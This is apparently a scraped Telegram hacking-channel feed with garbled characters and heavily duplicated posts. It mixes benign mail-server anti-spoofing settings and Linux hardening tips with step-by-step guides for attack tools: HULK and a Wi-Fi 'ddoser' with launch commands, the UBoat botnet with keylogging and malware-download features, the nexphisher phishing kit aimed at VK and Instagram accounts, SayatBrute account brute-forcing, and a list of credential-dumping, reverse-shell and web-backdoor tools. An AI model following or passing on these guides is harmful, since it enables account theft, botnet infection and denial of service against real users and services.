β β β Uππ»βΊπ«6π¬πβ β β β
π¦Global Spam Settings
#foradvancedusers
>g_from_allow_ip β IP addresses to bypass local from check
This setting has no further documentation currently available
Syntax: g_from_allow_ip string
>g_from_allow_to β destination user to bypass local from check
This setting has no further documentation currently available
Syntax: g_from_allow_to string
>g_from_bl β Domain Based Blacklist Zones, lookups FROM domain in dns
The βfromβ domain is checked against the specified RBL which must be a special βFROMβ based rbl which lists spammers by from address. Most spammers fake from addresses so this is a fairly marginally useful method.
Syntax: g_from_bl name=string stamp=string
>g_from_body_bounce β Reject if local from header address is probably faked
Checks if the sender is authenticated or from an address that can relay, if not then the message is bounced if it claims to be from a local domain. One of the settings to prevent forgery
Syntax: g_from_body_bounce bool
>g_from_bounce β Bounce if from is probably faked
Bounce if from address is probably faked.
This check is activated for any mail with a local domain in the from address but not using SMTP authentcation, relay allow IP address or spam allow IP address.
Syntax: g_from_bounce bool
>g_from_check β Check from matches valid local domain
Check from domains match valid local domains if user is authenticated, or
>g_from_allow.Should be used with g_from_bounce βtrueβ which basically forces them to authenticate and then makes this setting work properly.
Syntax: g_from_check bool
>g_from_domain β Default domain for from envelope
Fixes the βfromβ envelope if the email client failed to specify a domain name, this doesnβt fix the from header currently but we may change that in future!
Syntax: g_from_domain string
>g_from_exact β Check from matches authenticated user
Check from matches authenticated user. If user is not authenticated the setting is skipped.
Should be used with g_from_bounce βtrueβ which basically forces them to authenticate and then makes this setting work properly.
Syntax: g_from_exact bool
>g_from_force β From address for all sent messages
Used when you want to make all messages use the same valid bounce address, reply-to header will contain original from if it doesnβt exist
Syntax: g_from_force string
>g_from_header β From header used in delivery bounces
From header used in delivery bounces.
Syntax: g_from_header string
>g_from_list_too β Also enforce from rules from lists
Doesnβt allow lists to bypass forge rules
Syntax: g_from_list_too bool
>g_from_must_exist β Require local from addresses to exist or reject mail
Can be useful in blocking dumb spam robots
Syntax: g_from_must_exist bool
>g_from_noforge β If envelope or from is local domain then the other must be too
This can prevent many common forms of forgery, this will bounce some real email, so probably better to use the noforgeme setting instead. One of the settings to prevent forgery
Syntax: g_from_noforge bool
>g_from_noforge_some β If from matches this then from/envelope must match
Prevent forgeries of important local addresses, e.g. *support*
Syntax: g_from_noforge_some string
> g_from_noforgeme β If to==from then from and env from must match
This can prevent many common forms of forgery, this is safer than the noforge setting above, and generally almost as effective. One of the settings to prevent forgery
Syntax: g_from_noforgeme bool
> g_from_noforgename β If from contains two addresses the domains must match
Prevents forgery where the descriptive name is a fake email address that doesnβt match the real address
Syntax: g_from_noforgename bool
> g_from_nofriend β If forge setting would bounce message then allow message but donβt allow friend match
This setting modifies the g_from_noforgeme behaviour so it doesnβt block the message but does prevent a friend match occurring
Syntax: g_from_nofriend bool
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Global Spam Settings
#foradvancedusers
>g_from_allow_ip β IP addresses to bypass local from check
This setting has no further documentation currently available
Syntax: g_from_allow_ip string
>g_from_allow_to β destination user to bypass local from check
This setting has no further documentation currently available
Syntax: g_from_allow_to string
>g_from_bl β Domain Based Blacklist Zones, lookups FROM domain in dns
The βfromβ domain is checked against the specified RBL which must be a special βFROMβ based rbl which lists spammers by from address. Most spammers fake from addresses so this is a fairly marginally useful method.
Syntax: g_from_bl name=string stamp=string
>g_from_body_bounce β Reject if local from header address is probably faked
Checks if the sender is authenticated or from an address that can relay, if not then the message is bounced if it claims to be from a local domain. One of the settings to prevent forgery
Syntax: g_from_body_bounce bool
>g_from_bounce β Bounce if from is probably faked
Bounce if from address is probably faked.
This check is activated for any mail with a local domain in the from address but not using SMTP authentcation, relay allow IP address or spam allow IP address.
Syntax: g_from_bounce bool
>g_from_check β Check from matches valid local domain
Check from domains match valid local domains if user is authenticated, or
>g_from_allow.Should be used with g_from_bounce βtrueβ which basically forces them to authenticate and then makes this setting work properly.
Syntax: g_from_check bool
>g_from_domain β Default domain for from envelope
Fixes the βfromβ envelope if the email client failed to specify a domain name, this doesnβt fix the from header currently but we may change that in future!
Syntax: g_from_domain string
>g_from_exact β Check from matches authenticated user
Check from matches authenticated user. If user is not authenticated the setting is skipped.
Should be used with g_from_bounce βtrueβ which basically forces them to authenticate and then makes this setting work properly.
Syntax: g_from_exact bool
>g_from_force β From address for all sent messages
Used when you want to make all messages use the same valid bounce address, reply-to header will contain original from if it doesnβt exist
Syntax: g_from_force string
>g_from_header β From header used in delivery bounces
From header used in delivery bounces.
Syntax: g_from_header string
>g_from_list_too β Also enforce from rules from lists
Doesnβt allow lists to bypass forge rules
Syntax: g_from_list_too bool
>g_from_must_exist β Require local from addresses to exist or reject mail
Can be useful in blocking dumb spam robots
Syntax: g_from_must_exist bool
>g_from_noforge β If envelope or from is local domain then the other must be too
This can prevent many common forms of forgery, this will bounce some real email, so probably better to use the noforgeme setting instead. One of the settings to prevent forgery
Syntax: g_from_noforge bool
>g_from_noforge_some β If from matches this then from/envelope must match
Prevent forgeries of important local addresses, e.g. *support*
Syntax: g_from_noforge_some string
> g_from_noforgeme β If to==from then from and env from must match
This can prevent many common forms of forgery, this is safer than the noforge setting above, and generally almost as effective. One of the settings to prevent forgery
Syntax: g_from_noforgeme bool
> g_from_noforgename β If from contains two addresses the domains must match
Prevents forgery where the descriptive name is a fake email address that doesnβt match the real address
Syntax: g_from_noforgename bool
> g_from_nofriend β If forge setting would bounce message then allow message but donβt allow friend match
This setting modifies the g_from_noforgeme behaviour so it doesnβt block the message but does prevent a friend match occurring
Syntax: g_from_nofriend bool
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Best 2020 sites To free share code/accounts...
-https://pastebin.com/
- https://del.dog
- https://dpaste.org
- https://linkode.org
- https://hastebin.com
- https://bin.kv2.dev
-https://controlc.com/
-https://hastebin.com/
-https://justpaste.me/
-https://privatebin.net/
share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
-https://pastebin.com/
- https://del.dog
- https://dpaste.org
- https://linkode.org
- https://hastebin.com
- https://bin.kv2.dev
-https://controlc.com/
-https://hastebin.com/
-https://justpaste.me/
-https://privatebin.net/
share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Pastebin
Pastebin.com - #1 paste tool since 2002!
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
β β β Uππ»βΊπ«6π¬πβ β β β
π¦powerful Dos tool for Termux-linux:
> The main difference from Python version layed in Golang architecture for concurrency: the goroutines. hulk.py runs a new thread for each connection in the connection pool so it uses hundreds and thousands of threads. hulk.go just uses lightweight goroutines that used only tens of threads (commonly golang runtime started one thread for CPU core + several service threads). This architecture allows golang version better consume resources and got much higher connection pool on the same hardware than Python version can.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/grafov/hulk.git
2οΈβ£cd hulk
3οΈβ£python hulk.py
4οΈβ£Examples :
1) $ hulk -site http://example.com/test/ 2>/dev/null
2) $HULKMAXPROCS=4096 hulk -site http://example.com 2>/tmp/errlog
π¦ Notes :
> GOMAXPROCS Set it to number of your CPUs or higher (no more actual for latest golang versions).
> HULKMAXPROCS Limit the connection pool (1024 by default).
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦powerful Dos tool for Termux-linux:
> The main difference from Python version layed in Golang architecture for concurrency: the goroutines. hulk.py runs a new thread for each connection in the connection pool so it uses hundreds and thousands of threads. hulk.go just uses lightweight goroutines that used only tens of threads (commonly golang runtime started one thread for CPU core + several service threads). This architecture allows golang version better consume resources and got much higher connection pool on the same hardware than Python version can.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/grafov/hulk.git
2οΈβ£cd hulk
3οΈβ£python hulk.py
4οΈβ£Examples :
1) $ hulk -site http://example.com/test/ 2>/dev/null
2) $HULKMAXPROCS=4096 hulk -site http://example.com 2>/tmp/errlog
π¦ Notes :
> GOMAXPROCS Set it to number of your CPUs or higher (no more actual for latest golang versions).
> HULKMAXPROCS Limit the connection pool (1024 by default).
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - grafov/hulk: HULK DoS tool ported to Go with some additional features.
HULK DoS tool ported to Go with some additional features. - grafov/hulk
Forwarded from UNDERCODE SECURITY
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦UBoat - Proof of the PoC HTTP Botnet Design Concept
TOOLS + INSTALL :
t.me/UndercodeTesting
1οΈβ£ UBoat is a PoC HTTP botnet designed to replicate a full combat commercial botnet, such as the famous large-scale infectors Festi, Grum, Zeus and SpyEye.
2οΈβ£Surveys of popular botnets have shown that HTTP-based botnets have a set of attributes that make them difficult to detect.
> On the other hand, the number of studies devoted to identifying HTTP-based botnets is relatively small (compared to the number of studies based on IRC and P2P botnets), especially in HTTP-based mobile botnets that run on mobile devices and networks. The main goal of creating UBoat was to help security researchers and improve their understanding of HTTP loader-style commercial botnets so that effective countermeasures can be developed.
3οΈβ£features :
> C ++ encoded without any dependencies Encrypted C&C
>Communications Persistence to prevent the loss of your control
>Connection redundancy (uses server backup address or domain) DDoS
>Methods (TCP & UDP Flood) Task creation system (changing the HWID
system, country, IP, OS. System)
>remote command Updating and removing other malware
> Download and execute other malware
> Active and passive keylogger
>Enable Windows RDP Plugin system for quick feature updates
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
> detailed tutorial + pictures https://github.com/UBoat-Botnet/UBoat/wiki/Panel-Setup
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦UBoat - Proof of the PoC HTTP Botnet Design Concept
TOOLS + INSTALL :
t.me/UndercodeTesting
1οΈβ£ UBoat is a PoC HTTP botnet designed to replicate a full combat commercial botnet, such as the famous large-scale infectors Festi, Grum, Zeus and SpyEye.
2οΈβ£Surveys of popular botnets have shown that HTTP-based botnets have a set of attributes that make them difficult to detect.
> On the other hand, the number of studies devoted to identifying HTTP-based botnets is relatively small (compared to the number of studies based on IRC and P2P botnets), especially in HTTP-based mobile botnets that run on mobile devices and networks. The main goal of creating UBoat was to help security researchers and improve their understanding of HTTP loader-style commercial botnets so that effective countermeasures can be developed.
3οΈβ£features :
> C ++ encoded without any dependencies Encrypted C&C
>Communications Persistence to prevent the loss of your control
>Connection redundancy (uses server backup address or domain) DDoS
>Methods (TCP & UDP Flood) Task creation system (changing the HWID
system, country, IP, OS. System)
>remote command Updating and removing other malware
> Download and execute other malware
> Active and passive keylogger
>Enable Windows RDP Plugin system for quick feature updates
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
> detailed tutorial + pictures https://github.com/UBoat-Botnet/UBoat/wiki/Panel-Setup
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Interesting useful hacking tools 2020
- KsDumper - Dumping Processes Using The Power Of Kernel Space
- YARASAFE - Automatic Binary Function Similarity Checks with Yara
- AlertResponder - Automatic Security Alert Response Framework By AWS Serverless Application Model
- TAS - A Tiny Framework For Easily Manipulate The Tty And Create Fake Binaries
- Corsy v1.0 - CORS Misconfiguration Scanner
- TeleGram-Scraper - Telegram Group Scraper Tool (Fetch All Information About Group Members)
- Grouper2 - Find Vulnerabilities In AD Group Policy
- Gophish - Open-Source Phishing Toolkit
- Aaia - AWS Identity And Access Management Visualizer And Anomaly Finder
- Scallion - GPU-based Onion Addresses Hash Generator
- Bluewall - A Firewall Framework Designed For Offensive And Defensive Cyber Professionals
- AntiCheat-Testing-Framework - Framework To Test Any Anti-Cheat
- Gowitness - A Golang, Web Screenshot Utility Using Chrome Headless
- Lsassy - Extract Credentials From Lsass Remotely
- LOLBITS - C# Reverse Shell Using Background Intelligent Transfer Service (BITS) As Communication Protocol
- Shell Backdoor List - PHP / ASP Shell Backdoor List
- Hakrawler - Simple, Fast Web Crawler Designed For Easy, Quick Discovery Of Endpoints And Assets Within A Web Application
- Gtfo - Search For Unix Binaries That Can Be Exploited To Bypass System Security Restrictions
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Interesting useful hacking tools 2020
- KsDumper - Dumping Processes Using The Power Of Kernel Space
- YARASAFE - Automatic Binary Function Similarity Checks with Yara
- AlertResponder - Automatic Security Alert Response Framework By AWS Serverless Application Model
- TAS - A Tiny Framework For Easily Manipulate The Tty And Create Fake Binaries
- Corsy v1.0 - CORS Misconfiguration Scanner
- TeleGram-Scraper - Telegram Group Scraper Tool (Fetch All Information About Group Members)
- Grouper2 - Find Vulnerabilities In AD Group Policy
- Gophish - Open-Source Phishing Toolkit
- Aaia - AWS Identity And Access Management Visualizer And Anomaly Finder
- Scallion - GPU-based Onion Addresses Hash Generator
- Bluewall - A Firewall Framework Designed For Offensive And Defensive Cyber Professionals
- AntiCheat-Testing-Framework - Framework To Test Any Anti-Cheat
- Gowitness - A Golang, Web Screenshot Utility Using Chrome Headless
- Lsassy - Extract Credentials From Lsass Remotely
- LOLBITS - C# Reverse Shell Using Background Intelligent Transfer Service (BITS) As Communication Protocol
- Shell Backdoor List - PHP / ASP Shell Backdoor List
- Hakrawler - Simple, Fast Web Crawler Designed For Easy, Quick Discovery Of Endpoints And Assets Within A Web Application
- Gtfo - Search For Unix Binaries That Can Be Exploited To Bypass System Security Restrictions
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
KitPloit - PenTest & Hacking Tools
KsDumper - Dumping Processes Using The Power Of Kernel Space
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦LINUX TIPS
1οΈβ£Never use weak passwords
For some reason, everyone thinks that the attacker does not want to pick up your password. Perhaps he really will not do it. But in case of server compromise, the cracker will receive a file with password hashes of all users. When trying to recover hash values, weak passwords are the first to succumb. And given that many users often use the same password wherever possible, the consequences can be sad.
Password must be at least 11 characters long, contain letters in both registers, numbers and special characters. You canβt think of such a password - use the password generator.
Learn to remember passwords, and not write them on a piece of paper and sculpt to the monitor.
2οΈβ£Set a password on the BIOS
A BIOS password, in some cases, can make it difficult for an attacker to access your data.
3οΈβ£ Be sure to disable unused services
Do not use ssh? Disconnect! Is the web server running? Do you really need it? If you do not know how to display a list of working services and disable some of them, use auxiliary software.
4οΈβ£Update quickly and completely.
Install all patches that are related to security. Try to update as quickly as possible. Holes are often found in programs and while the user thinks about the need to update (and some even postpone updates for several days), vulnerabilities in programs are exploited, rootkits are installed, which are then quite difficult to clean up.
By the way, there is a funny Linux Mint distribution in which security updates are divided into categories: βit can be installedβ, βyou can wait with itβ and βbut you can not install it at allβ. If you need security, then avoid using such distributions.
5οΈβ£There are also enemies in LAN
Do not trust local network users. Many provide the resources of their computer to users from the local network. This approach to security policy is partially justified, because itβs easier for a local attacker to calculate and put a stool on his head, which stops many potential hackers. But an attacker from an external network can gain access to one of the computers on the local network and launch attacks from him.
6οΈβ£ Protect your privacy
Learn the built-in security features of your distribution. Many distributions provide the ability to remove traces of user activity, as browsers allow you to delete the cache and browsing history. For example, in Ubuntu, you can go to "System Preferences" and select "Privacy" to indicate what types of user activity should not be monitored.
7οΈβ£Use encryption. Whenever possible
Many programs have an option to encrypt data. Carefully study all the features provided and see how they could help you strengthen the overall security of the system. Encryption complicates an inconspicuous data substitution and protects police officers from unnecessary questions when they come to seize your computer.
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦LINUX TIPS
1οΈβ£Never use weak passwords
For some reason, everyone thinks that the attacker does not want to pick up your password. Perhaps he really will not do it. But in case of server compromise, the cracker will receive a file with password hashes of all users. When trying to recover hash values, weak passwords are the first to succumb. And given that many users often use the same password wherever possible, the consequences can be sad.
Password must be at least 11 characters long, contain letters in both registers, numbers and special characters. You canβt think of such a password - use the password generator.
Learn to remember passwords, and not write them on a piece of paper and sculpt to the monitor.
2οΈβ£Set a password on the BIOS
A BIOS password, in some cases, can make it difficult for an attacker to access your data.
3οΈβ£ Be sure to disable unused services
Do not use ssh? Disconnect! Is the web server running? Do you really need it? If you do not know how to display a list of working services and disable some of them, use auxiliary software.
4οΈβ£Update quickly and completely.
Install all patches that are related to security. Try to update as quickly as possible. Holes are often found in programs and while the user thinks about the need to update (and some even postpone updates for several days), vulnerabilities in programs are exploited, rootkits are installed, which are then quite difficult to clean up.
By the way, there is a funny Linux Mint distribution in which security updates are divided into categories: βit can be installedβ, βyou can wait with itβ and βbut you can not install it at allβ. If you need security, then avoid using such distributions.
5οΈβ£There are also enemies in LAN
Do not trust local network users. Many provide the resources of their computer to users from the local network. This approach to security policy is partially justified, because itβs easier for a local attacker to calculate and put a stool on his head, which stops many potential hackers. But an attacker from an external network can gain access to one of the computers on the local network and launch attacks from him.
6οΈβ£ Protect your privacy
Learn the built-in security features of your distribution. Many distributions provide the ability to remove traces of user activity, as browsers allow you to delete the cache and browsing history. For example, in Ubuntu, you can go to "System Preferences" and select "Privacy" to indicate what types of user activity should not be monitored.
7οΈβ£Use encryption. Whenever possible
Many programs have an option to encrypt data. Carefully study all the features provided and see how they could help you strengthen the overall security of the system. Encryption complicates an inconspicuous data substitution and protects police officers from unnecessary questions when they come to seize your computer.
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦for beginers Hacking VK, insty etc. using phishing
-similar sended tools : hiddeneye - shellphisher-
#fAstTips
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦for beginers Hacking VK, insty etc. using phishing
-similar sended tools : hiddeneye - shellphisher-
#fAstTips
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
updateuse for learn
2οΈβ£apt upgrade
3οΈβ£apt install git -y
4οΈβ£pkg up
5οΈβ£pkg install curl
6οΈβ£pkg install php
7οΈβ£pkg install wget
8οΈβ£git clone git: //github.com/htr-tech/nexphisher.git
9οΈβ£cd nexphisher
πbash tmux_setup
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦2020 from 10 days Bruteforce accounts sayat.me
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£install for Linux
1) apt-get update && apt-get install git && apt-get install python3 && apt-get install python3-pip --fix-missing
2) git clone https://github.com/termux-lab/SayatBrute
3) cd SayatBrute
4) pip3 install colorama && pip3 install requests
5) python3 main.py
2οΈβ£install for Windows
1) Download Python3
2) Download Git
3) git clone https://github.com/termux-lab/SayatBrute
4) pip install colorama
5) pip install requests
6) cd SayatBrute
7) python main.py
3οΈβ£install for Termux
1) pkg install python && pkg install git
2) pip3 install colorama && pip3 install requests
3) cd SayatBrute
4) git clone https://github.com/termux-lab/SayatBrute
5) python3 main.py
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦2020 from 10 days Bruteforce accounts sayat.me
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£install for Linux
1) apt-get update && apt-get install git && apt-get install python3 && apt-get install python3-pip --fix-missing
2) git clone https://github.com/termux-lab/SayatBrute
3) cd SayatBrute
4) pip3 install colorama && pip3 install requests
5) python3 main.py
2οΈβ£install for Windows
1) Download Python3
2) Download Git
3) git clone https://github.com/termux-lab/SayatBrute
4) pip install colorama
5) pip install requests
6) cd SayatBrute
7) python main.py
3οΈβ£install for Termux
1) pkg install python && pkg install git
2) pip3 install colorama && pip3 install requests
3) cd SayatBrute
4) git clone https://github.com/termux-lab/SayatBrute
5) python3 main.py
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - termux-lab/SayatBrute
Contribute to termux-lab/SayatBrute development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦arrange a DDoS attack on Wi-Fi from the phone
> DDoS is a hacker attack on a computer system in order to bring it to failure, that is, the creation of conditions under which users of the system will not be able to access the provided system resources (servers), or this access will be difficult.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£pkg upgrade
2οΈβ£pkg install python python2 git
3οΈβ£cd
4οΈβ£git clone https://github.com/artem-cell/wifi-dosser
5οΈβ£cd wifi-dosser
6οΈβ£pip2 install requests mechanize
7οΈβ£ls
8οΈβ£python2 wifi-ddoser.py
9οΈβ£To carry out an attack, you need to connect to a router. Next, enter the command below.
> python2 wifi-ddoser.py example.com 80 3 999999999999
π80 and 3 are standard ports
1οΈβ£1οΈβ£999999999999 is the attack time in seconds
1οΈβ£2οΈβ£To stop the attack, you need to restart the router
use for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦arrange a DDoS attack on Wi-Fi from the phone
> DDoS is a hacker attack on a computer system in order to bring it to failure, that is, the creation of conditions under which users of the system will not be able to access the provided system resources (servers), or this access will be difficult.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£pkg upgrade
2οΈβ£pkg install python python2 git
3οΈβ£cd
4οΈβ£git clone https://github.com/artem-cell/wifi-dosser
5οΈβ£cd wifi-dosser
6οΈβ£pip2 install requests mechanize
7οΈβ£ls
8οΈβ£python2 wifi-ddoser.py
9οΈβ£To carry out an attack, you need to connect to a router. Next, enter the command below.
> python2 wifi-ddoser.py example.com 80 3 999999999999
π80 and 3 are standard ports
1οΈβ£1οΈβ£999999999999 is the attack time in seconds
1οΈβ£2οΈβ£To stop the attack, you need to restart the router
use for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Install Wireshark in Termux full by undercode:
1) First install x11-repo and nano
2) pkg update
3) pkg upgrade -y
4) pkg install x11-repo
5) pkg install nano
6) Now install xterm
7) pkg install xterm
8) tigervnc and Wireshark
9) pkg install tigervnc
10) pkg install wireshark-gtk
11) Now we need to change one file
12) cd $ HOME
13) nano ../usr/etc/bash.bashrc
14) We go to the very end of the file and write
15) export DISPLAY = ": 1
16) Save - ctrl + x, y, enter
> Now we write
17) source ../usr/etc/bash.bashrc
18) vncserver
19) At the first start, you will be asked to enter a password.
127.0.0.1::5901
20) If when creating vnc in termux you had written localhost: 2, then instead of 1 we write 2, with the remaining numbers the same way.
21) In the name field, at least.
22) It remains only to connect, you will be asked to enter the password that you entered when you first created the vnc server.
use for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Install Wireshark in Termux full by undercode:
1) First install x11-repo and nano
2) pkg update
3) pkg upgrade -y
4) pkg install x11-repo
5) pkg install nano
6) Now install xterm
7) pkg install xterm
8) tigervnc and Wireshark
9) pkg install tigervnc
10) pkg install wireshark-gtk
11) Now we need to change one file
12) cd $ HOME
13) nano ../usr/etc/bash.bashrc
14) We go to the very end of the file and write
15) export DISPLAY = ": 1
16) Save - ctrl + x, y, enter
> Now we write
17) source ../usr/etc/bash.bashrc
18) vncserver
19) At the first start, you will be asked to enter a password.
127.0.0.1::5901
20) If when creating vnc in termux you had written localhost: 2, then instead of 1 we write 2, with the remaining numbers the same way.
21) In the name field, at least.
22) It remains only to connect, you will be asked to enter the password that you entered when you first created the vnc server.
use for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Universal Installer Termux Fsociety
what this great tool can do ?
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pkg update
2) pkg upgrade -y
3) git clone https://github.com/Manisso/fsociety
4) cd fsociety
5) . /install.sh
6) python2 fsociety.py
π¦Menu
1. collection of information
2.Password Attacks
3.Wireless Testing
4. Operation Tools
5.Sniffing & Spoofing
6.Web Hack
7. Private Web Hacking
8.After Operation
0.install updates
99.output
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Universal Installer Termux Fsociety
what this great tool can do ?
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pkg update
2) pkg upgrade -y
3) git clone https://github.com/Manisso/fsociety
4) cd fsociety
5) . /install.sh
6) python2 fsociety.py
π¦Menu
1. collection of information
2.Password Attacks
3.Wireless Testing
4. Operation Tools
5.Sniffing & Spoofing
6.Web Hack
7. Private Web Hacking
8.After Operation
0.install updates
99.output
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - Manisso/fsociety: fsociety Hacking Tools Pack β A Penetration Testing Framework
fsociety Hacking Tools Pack β A Penetration Testing Framework - Manisso/fsociety
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Termux INSTALL NMAP :
1οΈβ£
-sP check if ip address is available.
-PN consider all hosts to be working even if they are not working.
-sS / sT / sA / sM / sW scan tcp ports.
-sU scan udp ports.
-sN / sF / sX - TCP NULL and FIN scan.
-sC run the default script.
-sI Indle scan.
-p specify the range of ports to check.
-sV port exploration for verifying service versions.
-O define the operating system.
-T 0-5 scan speed, the more the faster.
-D mask the scan using dummy IP.
-S change your IP address to the specified one.
-e use a specific interface.
--spoof-mac set your MAC address.
-A definition of the operating system using spec. scripts.
enjoyβ€οΈππ»
#FastTips
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Termux INSTALL NMAP :
1οΈβ£
pkg update
2οΈβ£pkg upgrade - y
3οΈβ£pkg install nmap
4οΈβ£Launch command
> nmap options ip_address
5οΈβ£And now I will show you the main functions of nmap :
-sL create a list of running hosts.-sP check if ip address is available.
-PN consider all hosts to be working even if they are not working.
-sS / sT / sA / sM / sW scan tcp ports.
-sU scan udp ports.
-sN / sF / sX - TCP NULL and FIN scan.
-sC run the default script.
-sI Indle scan.
-p specify the range of ports to check.
-sV port exploration for verifying service versions.
-O define the operating system.
-T 0-5 scan speed, the more the faster.
-D mask the scan using dummy IP.
-S change your IP address to the specified one.
-e use a specific interface.
--spoof-mac set your MAC address.
-A definition of the operating system using spec. scripts.
enjoyβ€οΈππ»
#FastTips
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β